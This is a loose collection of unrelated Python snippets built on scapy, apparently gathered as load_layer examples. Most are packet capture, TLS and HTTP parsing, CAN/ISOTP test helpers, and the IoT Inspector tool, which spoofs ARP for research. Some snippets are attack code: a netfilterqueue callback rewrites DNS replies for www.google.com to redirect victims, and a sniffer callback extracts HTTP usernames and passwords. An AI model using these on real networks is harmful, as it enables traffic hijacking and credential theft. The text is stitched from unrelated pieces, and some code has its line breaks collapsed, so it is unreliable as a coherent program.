def main(): os.system("sudo iptables -F") # This one drops all (anywhere source and destination) #os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP") # Drop all from source localhost os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 127.0.0.1 -j DROP") # Drop all from source 10.0.2.15 that is my IP address (ifconfig) os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 10.0.2.15 -j DROP") os.system("sudo iptables -L") # This is required for traffic to localhost conf.L3socket = L3RawSocket load_layer("http") req = HTTP()/HTTPRequest( Accept_Encoding=b'gzip, deflate', Cache_Control=b'no-cache', Connection=b'keep-alive', Host=b'www.secdev.org', Pragma=b'no-cache' ) a = TCP_client.tcplink(HTTP, "www.secdev.org", 80) answser = a.sr1(req) a.close() with open("www.secdev.org.html", "wb") as file: file.write(answser.load)
def process_packet(packet):
    scapy.load_layer('http')
    # print(packet)
    # Convert the raw netfilterqueue payload into a scapy packet
    scapy_packet = scapy.IP(packet.get_payload())
    # print(scapy_packet.show())
    # Check if the packet has a layer that contains a DNS response
    if scapy_packet.haslayer(scapy.DNSRR):
        # Store the queried domain name
        qname = scapy_packet[scapy.DNSQR].qname
        # Check if the website we are going to spoof is in the qname
        if "www.google.com" in qname.decode():
            # Report that we are spoofing
            print("[+] Spoofing target...")
            # Create an answer for the target: rrname stores the website name
            # and rdata the IP of our spoofed website
            answer = scapy.DNSRR(rrname=qname, rdata=get_argument().server)
            # Replace the answer section with the one we built
            scapy_packet[scapy.DNS].an = answer
            # Set the answer count to 1
            scapy_packet[scapy.DNS].ancount = 1
            # Delete the length and checksum fields in the IP layer so scapy
            # recomputes them; otherwise the modified packet would be corrupt
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            # Same for the UDP layer
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            # Write the modified scapy packet back into the queued packet
            packet.set_payload(bytes(scapy_packet))
    # Forward the packet to the target
    packet.accept()
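# A callback like this is typically driven by python-netfilterqueue. A minimal
# sketch, assuming queue number 0 and an iptables NFQUEUE rule diverting
# forwarded traffic into it:

import os
from netfilterqueue import NetfilterQueue

# Divert forwarded packets into userspace queue 0 (assumed queue number)
os.system("iptables -I FORWARD -j NFQUEUE --queue-num 0")

queue = NetfilterQueue()
queue.bind(0, process_packet)  # process_packet is the callback above
try:
    queue.run()
except KeyboardInterrupt:
    os.system("iptables --flush")  # restore the firewall on exit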
def capture_pcap(q: Queue):
    import pcap
    import scapy
    from scapy.layers.l2 import Ether
    from scapy.all import load_layer
    load_layer('inet')

    s = pcap.pcap('eno1', promisc=True, immediate=True)
    s.setfilter('udp portrange 16900-17100')

    def raw_to_dict(data):
        ue = Ether(data)
        ip = ue.payload
        if ip.version != 4:
            return
        if ip.proto != 17:
            return
        udp = ip.payload
        if udp.len == 0:
            return
        if not isinstance(udp.payload, scapy.packet.Raw):
            return
        payload = udp.load
        return {
            'incoming': ip.dst.startswith('192.168.'),
            'data': payload,
            'src_port': udp.sport,
            'dst_port': udp.dport,
        }

    for t, data in s:
        dct = raw_to_dict(data)
        if dct:  # skip packets that raw_to_dict rejected
            q.put_nowait(dct)
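# A hedged usage sketch for the capture function above, assuming it runs in a
# separate process feeding a multiprocessing.Queue (the interface name 'eno1'
# is hard-coded in the capture):

from multiprocessing import Process, Queue

q = Queue()
Process(target=capture_pcap, args=(q,), daemon=True).start()

while True:
    pkt = q.get()  # blocks until the sniffer delivers a parsed packet
    print(pkt['src_port'], '->', pkt['dst_port'], len(pkt['data']), 'bytes')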
def main(): sc.load_layer("http") # The whole process should be run as root. try: is_admin = os.getuid() == 0 except AttributeError: is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if not is_admin: sys.stderr.write('Please run as root.\n') sys.exit(1) utils.log('[Main] Terminating existing processes.') if not kill_existing_inspector(): utils.log('[Main] Unable to end existing process. Exiting.') return utils.log('[Main] Starting webserver.') webserver.start_thread() utils.log('[Main] Starting inspector.') inspector.enable_ip_forwarding() utils.safe_run(inspector.start, args=(webserver.context,)) while not webserver.context['quit']: host_state = webserver.context['host_state'] if host_state: with host_state.lock: if host_state.quit: break try: time.sleep(2) except KeyboardInterrupt: print('') break utils.log('[Main] Restoring ARP...') host_state = webserver.context['host_state'] if host_state: with host_state.lock: host_state.spoof_arp = False for t in range(10): print('Cleaning up ({})...'.format(10 - t)) time.sleep(1) inspector.disable_ip_forwarding() utils.log('[Main] Quit.') print('\n' * 100) print(""" Princeton IoT Inspector has terminated. Feel free to close this window. """)
def main():
    parser = argparse.ArgumentParser()
    input_group = parser.add_mutually_exclusive_group(required=True)
    input_group.add_argument('-n', '--online', '--interface', action='store',
                             dest='input_interface',
                             help='capture online data from INPUT_INTERFACE')
    input_group.add_argument('-f', '--offline', '--file', action='store',
                             dest='input_file',
                             help='capture offline data from INPUT_FILE')
    output_group = parser.add_mutually_exclusive_group(required=True)
    output_group.add_argument('-c', '--csv', '--flow', action='store_const',
                              const='flow', dest='output_mode',
                              help='output flows as csv')
    output_group.add_argument('-s', '--json', '--sequence', action='store_const',
                              const='sequence', dest='output_mode',
                              help='output flow segments as json')
    parser.add_argument(
        'output',
        help='output file name (in flow mode) or directory (in sequence mode)')
    args = parser.parse_args()

    load_layer('tls')
    sniffer = create_sniffer(args.input_file, args.input_interface,
                             args.output_mode, args.output)
    sniffer.start()
    try:
        sniffer.join()
    except KeyboardInterrupt:
        sniffer.stop()
    finally:
        sniffer.join()
def process_sniffed_packet(packet):
    # Load the HTTP layer
    scapy.load_layer('http')
    # Check whether the packet carries an HTTP request
    if packet.haslayer(HTTPRequest):
        # Store the URL of the website
        url = get_url(packet)
        # Print the URL in the terminal
        print("[+] HTTP Request >> " + url.decode())
        # Store the username and password of a user
        login_info = get_login_info(packet)
        # Check whether any credentials were found
        if login_info:
            print("\n\n[+] Possible username/password > " + login_info.decode() + "\n\n")
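# A callback like this is usually handed to scapy's sniff(). A minimal driver
# sketch, assuming the interface name "eth0" and that get_url/get_login_info
# are defined elsewhere in the script:

import scapy.all as scapy

scapy.sniff(iface="eth0", store=False,
            prn=process_sniffed_packet)  # invoke the callback per packet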
def load_scapy(isotp=True, uds=False):
    '''
    Initializes scapy for use within the custom ansible module.
    Loads the needed scapy modules and makes them directly available
    in the global namespace.
    '''
    global ISOTPSOCKET_IS_NATIVE

    if not __INIT:
        raise RuntimeError("init() was not called")

    if WINDOWS:
        debug(
            "Platform is Windows -> CANSocket is python-can, ISOTPSocket is ISOTPSoftSocket"
        )
        conf.contribs['CANSocket'] = {'use-python-can': True}
        conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False}
    elif LINUX:
        debug("Platform is Linux -> CANSocket is native")
        conf.contribs['CANSocket'] = {'use-python-can': False}
        if __linux_kernel_module_loaded('can_isotp'):
            debug("using can_isotp kernel module")
            conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': True}
            ISOTPSOCKET_IS_NATIVE = True
        else:
            debug("can_isotp kernel module not loaded")
            conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False}
            ISOTPSOCKET_IS_NATIVE = False

    load_contrib("cansocket")
    load_layer("can")
    if isotp:
        load_contrib("isotp")
    if uds:
        load_contrib("automotive.uds")
    _load("scapy.utils")
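# A hedged call sequence for the helper above, assuming the module's own
# init() (referenced by the RuntimeError) performs setup and sets __INIT:

init()  # assumed module initializer; must run first
load_scapy(isotp=True, uds=True)
if ISOTPSOCKET_IS_NATIVE:
    debug("ISOTPSocket will use the can_isotp kernel module")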
def get(self): """ :param bad_filename: 数据包存储位置,需要是csv格式 :param bad_pcap_filename: pcap包读取位置 :param num: 读取数据包的数量 :return: None """ PD = PcapDecode() scapy.load_layer('tls') with open(self.bad_filename, 'a') as f: with scapy.PcapReader(self.bad_pcap_filename) as packets: for i, pkt in enumerate(packets): data = PD.ether_decode(pkt) [ f.write("{},".format(value)) for key, value in data.items() ] # [f.write("{}:{}, ".format(key, value)) for key, value in data.items()] f.write("bad\n") # if (i % 200 == 0): # print("目前已处理{0}个数据包.".format(i)) if i == self.num: print("已经处理{}个恶意文件数据包".format(i)) return True
import psycopg2.pool
import re

from scapy.all import AsyncSniffer, load_layer
from scapy.layers.l2 import Ether
from scapy.layers.tls.extensions import ServerName
from urllib.parse import urlparse

# Config
threshold = 15
database_url = ''

# Globals
load_layer('tls')
captured_packets = list()
# Match outbound TLS records (content type 0x16 = handshake) whose first
# handshake byte is 0x01 (ClientHello); the tcp[12] arithmetic skips the
# variable-length TCP header to reach the payload.
filter_ = 'tcp dst port 443 and (tcp[((tcp[12] & 0xf0) >> 2)] = 0x16 && (tcp[((tcp[12] & 0xf0) >> 2)+5] = 0x01))'

parsed_url = urlparse(database_url)
username = parsed_url.username
password = parsed_url.password
database = parsed_url.path[1:]
hostname = parsed_url.hostname
pool = psycopg2.pool.ThreadedConnectionPool(0, 100,
                                            user=username,
                                            password=password,
                                            host=hostname,
                                            database=database)


# Classes
class Handshake(object):
def main(): sc.load_layer("http") # The whole process should be run as root. try: is_admin = os.getuid() == 0 except AttributeError: is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if not is_admin: sys.stderr.write('Please run as root.\n') sys.exit(1) # Check for Windows if utils.get_os() == 'windows': # Check Npcap installation npcap_path = os.path.join(os.environ['WINDIR'], 'System32', 'Npcap') if not os.path.exists(npcap_path): sys.stderr.write( "IoT Inspector cannot run without installing Npcap.\n") sys.stderr.write("For details, visit " + server_config.NPCAP_ERROR_URL) utils.open_browser_on_windows(server_config.NPCAP_ERROR_URL) sys.exit(1) # Check presence of multiple interfaces (e.g., VPN) if len(utils.get_network_ip_range()) == 0: sys.stderr.write( "IoT Inspector cannot run with multiple network interfaces running.\n" ) sys.stderr.write("For details, visit " + server_config.NETMASK_ERROR_URL) utils.open_browser_on_windows(server_config.NETMASK_ERROR_URL) sys.exit(1) utils.log('[Main] Terminating existing processes.') if not kill_existing_inspector(): utils.log('[Main] Unable to end existing process. Exiting.') return utils.log('[Main] Starting inspector.') inspector.enable_ip_forwarding() # We don't wrap the function below in safe_run because, well, if it crashes, # it crashes. host_state = inspector.start() # Waiting for termination while True: with host_state.lock: if host_state.quit: break try: time.sleep(2) except KeyboardInterrupt: print('') break utils.log('[Main] Restoring ARP...') with host_state.lock: host_state.spoof_arp = False for t in range(10): print('Cleaning up ({})...'.format(10 - t)) time.sleep(1) inspector.disable_ip_forwarding() utils.log('[Main] Quit.') print('\n' * 100) print(""" Princeton IoT Inspector has terminated. Feel free to close this window. """) # Remove PID file try: os.remove(get_pid_file()) except Exception: pass
def __init__(self, pcap_file_name, pcap_parser_engine="scapy"):
    """
    Init function imports libraries based on the parser engine selected

    Return:
    * packetDB ==> Full Duplex Packet Streams
      - Used while finally plotting streams as graph
      - dump packets during report generation
    * lan_hosts ==> Private IP (LAN) list - device details
    * destination_hosts ==> Destination Hosts
      - communication details
      - tor identification
      - malicious identification
    """
    # Initialize Data Structures
    memory.packet_db = {}
    memory.lan_hosts = {}
    memory.destination_hosts = {}
    memory.possible_mal_traffic = []
    memory.possible_tor_traffic = []

    # Set Pcap Engine
    self.engine = pcap_parser_engine

    # Import library for pcap parser engine selected
    if pcap_parser_engine == "scapy":
        try:
            from scapy.all import rdpcap
        except ImportError:
            logging.error("Cannot import selected pcap engine: Scapy!")
            sys.exit()

        global tls_view_feature
        try:
            from scapy.all import load_layer
            tls_view_feature = True
            logging.info("tls view feature enabled")
        except ImportError:
            # Default to False so the check below cannot hit a NameError
            tls_view_feature = False
            logging.info("tls view feature not enabled")

        if tls_view_feature:
            load_layer("tls")

        # Suppress scapy warnings and prefer errors only
        logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

        # Scapy sessions and other types use more O(N) iterations, so just
        # use rdpcap + our own iteration (create full duplex streams)
        self.packets = rdpcap(pcap_file_name)
    elif pcap_parser_engine == "pyshark":
        try:
            import pyshark
        except ImportError:
            logging.error("Cannot import selected pcap engine: PyShark!")
            sys.exit()

        self.packets = pyshark.FileCapture(pcap_file_name,
                                           include_raw=True,
                                           use_json=True)
        # self.packets.load_packets()
        # self.packets.apply_on_packets(self.analyse_packet_data, timeout=100)

    # Analyse capture to populate data
    self.analyse_packet_data()
"TLSv1.2": "#bfbdff", "TLSv1.3": "#a14545", "POP3": "#c1a4ba", "DNS": "#00ffff", "DNSv6": "#00ffff", "SSH": "#4c98b3", "SSHv6": "#4c98b3", "SSDP": "#ffe3e5", "SSDPv6": "#ffe3e5", "ICMP": "#fce0ff", "ICMPv6": "#fce0ff", "NTP": "#daeeff", "NTPv6": "#daeeff" } load_layer("tls") load_layer("http") class Core(): # 包编号 packet_id = 1 # 开始标志 start_flag = False # 暂停标志 pause_flag = False # 停止标志 stop_flag = False # 保存标志 save_flag = False # 开始时间戳
# Copyright (C) Nils Weiss <*****@*****.**>
# This program is published under a GPLv2 license

"""
Default imports required for setup of CAN interfaces
"""

import os
import subprocess
import sys

from platform import python_implementation

from scapy.all import load_layer, load_contrib, conf, log_runtime
import scapy.modules.six as six
from scapy.consts import LINUX

load_layer("can", globals_dict=globals())
conf.contribs['CAN']['swap-bytes'] = False

# ############################################################################
# """ Define interface names for automotive tests """
# ############################################################################
iface0 = "vcan0"
iface1 = "vcan1"

try:
    _root = os.geteuid() == 0
except AttributeError:
    _root = False

_not_pypy = "pypy" not in python_implementation().lower()
_socket_can_support = False
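# vcan0/vcan1 above refer to Linux virtual CAN interfaces. A hedged setup
# sketch using the subprocess import above, assuming root privileges and the
# vcan kernel module:

def setup_vcan(iface):
    # Create and bring up a virtual CAN interface (requires root)
    subprocess.call(["modprobe", "vcan"])
    subprocess.call(["ip", "link", "add", "name", iface, "type", "vcan"])
    subprocess.call(["ip", "link", "set", "dev", iface, "up"])

setup_vcan(iface0)
setup_vcan(iface1)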
from scapy.all import load_contrib, load_layer
from scapy.layers.can import CAN
from scapy.contrib.isotp import ISOTPHeader, ISOTP_FF, ISOTPHeaderEA
from scapy.contrib.cansocket import CANSocket
import argparse
from termcolor import colored
from scanners import isotpscan

load_layer("can")
load_contrib("isotp")
load_contrib("cansocket")


# Save background noise
def get_background_noise_callback(noise_packet):
    global noise_IDs
    noise_IDs.append(noise_packet.identifier)


def get_isotp_packet(type=None):
    if type == "extended":
        pkt = ISOTPHeaderEA() / ISOTP_FF()
        pkt.extended_address = 0
        pkt.data = b'\x00\x00\x00\x00\x00'
    else:
        pkt = ISOTPHeader() / ISOTP_FF()
        pkt.data = b'\x00\x00\x00\x00\x00\x00'
    pkt.identifier = 0x0
    pkt.message_size = 100
    return pkt
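# A hedged usage sketch for the helpers above, assuming a native CANSocket on
# vcan0 and that noise_IDs is the module-level list the callback appends to:

noise_IDs = []  # filled by get_background_noise_callback

sock = CANSocket(channel="vcan0")
# Record background traffic for a few seconds before scanning
sock.sniff(timeout=5, prn=get_background_noise_callback)
# Probe with an ISOTP first frame on the raw CAN socket
sock.send(get_isotp_packet())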
        self.sniffer.stop()

    def remove_old_packets(self):
        """
        remove all packets already read by `get_packets`
        !! Warning - you will lose the references to those packets !!
        """
        logger.debug("removing old packets with index at {}".format(
            self.last_index))
        del self.store[:self.last_index]

    def started(self) -> bool:
        return True if self.sniffer else False

    def packet_q(self) -> int:
        """ how many packets are currently in store, not processed """
        return len(self.store) - self.last_index


if __name__ == '__main__':
    load_layer('http')
    p = PacketReader('en0')
    p.sniff()
    while True:
        pck = p.get_packets()
        for pac in pck:
            if pac.haslayer(http.HTTP):
                pac.show()  # show() prints itself; wrapping it in print() adds a stray "None"
def __init__(self, receiver):
    self.receiver = receiver
    self.fragments = {}
    load_layer('inet')
#!/usr/bin/env python3

import scapy.all as scapy
from scapy.layers import http
import re, json, random, os, sys
import scapy.packet as packet

scapy.load_layer("http")

# Global variables here
PCAP_FILE = os.getcwd() + "/test.pcapng"


def dump_to_json(parsed_dict, part_name):
    out_file = PCAP_FILE.split("/")
    out_file = out_file[-1]
    out_file = out_file + '_' + part_name + ".json"
    with open(out_file, 'w') as f:
        f.write(json.dumps(parsed_dict, indent=2))


def create_host_dir(dr, rand_num):
    if os.path.exists(dr):
        dr = f"{dr}_{rand_num}"
        os.mkdir(dr)
    else:
        os.mkdir(dr)
    return dr
# print(dir(scapy))
# import random
import scapy.all as scapy
import scapy.layers as layers

scapy.load_layer(
    "http")  # does not complain even if we supply an incorrect name
# print(dir(layers))

# host = '8.8.8.8'
# host = 'https://httpbin.org/get'
host = '54.164.234.192'
ip = scapy.IP(dst=host)
print(dir(layers.http))
# scapy.explore(layers.http)

http = layers.http.HTTP()
# http.show()
request = layers.http.HTTPRequest(Accept_Encoding=b'gzip, deflate',
                                  Cache_Control=b'no-cache',
                                  Connection=b'keep-alive',
                                  Host=host,
                                  Pragma=b'no-cache')
# request.show()
req = http / request
a = scapy.TCP_client.tcplink(layers.http.HTTP, host, 80)  # needs root?
# answer = a.sr1(ip/req)
scapy.send(ip / req)
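# The last two lines mix two approaches: TCP_client.tcplink already runs its
# own TCP/IP handshake, so the request should go through the automaton without
# an IP layer, whereas scapy.send(ip / req) emits a bare segment on no
# established connection. A hedged sketch of the tcplink path, following
# scapy's documented HTTP example:

# Send the HTTP request over the established automaton connection;
# no IP()/TCP() layers are added because tcplink supplies them.
answer = a.sr1(req, timeout=3)
a.close()
if answer:
    print(answer.load[:200])  # first bytes of the response body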
def __init__(self):
    load_layer('tls')
    self.packets = collections.deque(maxlen=1000)
import signal
import sys


def signal_handler(sig, frame):
    final_print()
    sys.exit(0)


signal.signal(signal.SIGINT, signal_handler)

SCRIPT_DIR = Path(os.path.dirname(os.path.abspath(__file__)))
PCAPS_DIR = Path(f'{SCRIPT_DIR}/pcaps')  # default directory

try:
    load_layer("http")
except Exception:
    print("*Error: could not load 'http' layer from scapy library")
    sys.exit(0)

headers_counts = Counter()
num_of_http_pkts = 0

# https://en.wikipedia.org/wiki/List_of_HTTP_header_fields
KNOWN_HEADERS = [
    "Cache-Control", "Connection", "Permanent", "Content-Length",
    "Content-MD5", "Content-Type", "Date", "Keep-Alive", "Pragma",
    "Upgrade", "Via", "Warning", "X-Request-ID", "X-Correlation-ID",
    "A-IM", "Accept", "Accept-Charset", "Accept-Encoding",
    "Accept-Language", "Accept-Datetime", "Access-Control-Request-Method",
    "Access-Control-Request-Headers",
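# A hedged sketch of how headers_counts might be filled from sniffed packets,
# assuming scapy's HTTPRequest layer and a hypothetical capture file name.
# Scapy stores header fields with underscores, so they are mapped back to the
# dashed names used in KNOWN_HEADERS:

from scapy.all import sniff
from scapy.layers.http import HTTPRequest

def count_headers(pkt):
    global num_of_http_pkts
    if pkt.haslayer(HTTPRequest):
        num_of_http_pkts += 1
        for field, value in pkt[HTTPRequest].fields.items():
            if value is None:
                continue
            name = field.replace('_', '-')  # Cache_Control -> Cache-Control
            headers_counts[name] += 1

sniff(offline=str(PCAPS_DIR / 'sample.pcap'),  # 'sample.pcap' is hypothetical
      prn=count_headers, store=False)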
print(f'[*] BPF: {put_color(bpf, "white")}')
print(f'[*] output filename: {put_color(output_filename, "white")}')
print(
    f'[*] output as json: {put_color(need_json, "green" if need_json else "white", bold=False)}'
)
print(
    f'[*] save raw pcap: {put_color(savepcap, "green" if savepcap else "white", bold=False)}'
)

if savepcap:
    print(f'[*] saved in: {put_color(pcap_filename, "white")}.pcap')

print()
load_layer("tls")
start_ts = time.time()

try:
    sniff(**sniff_args)
except Exception as e:
    print(f'[!] {put_color(f"Something went wrong: {e}", "red")}')
    # raise

end_ts = time.time()

print('\r[+]',
      f'all packets: {put_color(COUNT, "cyan")};',
      f'client hello: {put_color(COUNT_CLIENT, "cyan")};',
      f'server hello: {put_color(COUNT_SERVER, "cyan")};',
      f'in {put_color(timer_unit(end_ts - start_ts), "white")}')
import scapy.layers.http
from scapy.all import load_layer
from scapy.all import sr1, IP, ICMP, TCPSession, sr, srp, srp1, send, sendp, sendpfast, RandShort
from scapy.layers.inet import TCP_client, TCP, Ether, UDP

ans, unans = sr(IP(dst="8.8.8.8") / TCP(dport=[80, 443], flags="S"), timeout=1)
p = sr1(IP(dst='8.8.8.8') / ICMP())
if p:
    p.show()

# load_layer("http") must run before the HTTP classes are used
load_layer("http")
dir(scapy.layers.http)
HTTPRequest().show()
HTTPResponse().show()

req = HTTP() / HTTPRequest(
    Accept_Encoding=b'gzip, deflate',
    Cache_Control=b'no-cache',
    Connection=b'keep-alive',
    Host=b'www.secdev.org',
    Pragma=b'no-cache'
)
a = TCP_client.tcplink(HTTP, "secdev.org", 80)
answer = a.sr1(req, timeout=3)
a.close()
with open("www.secdev.org.html", "wb") as file:
    file.write(answer.load)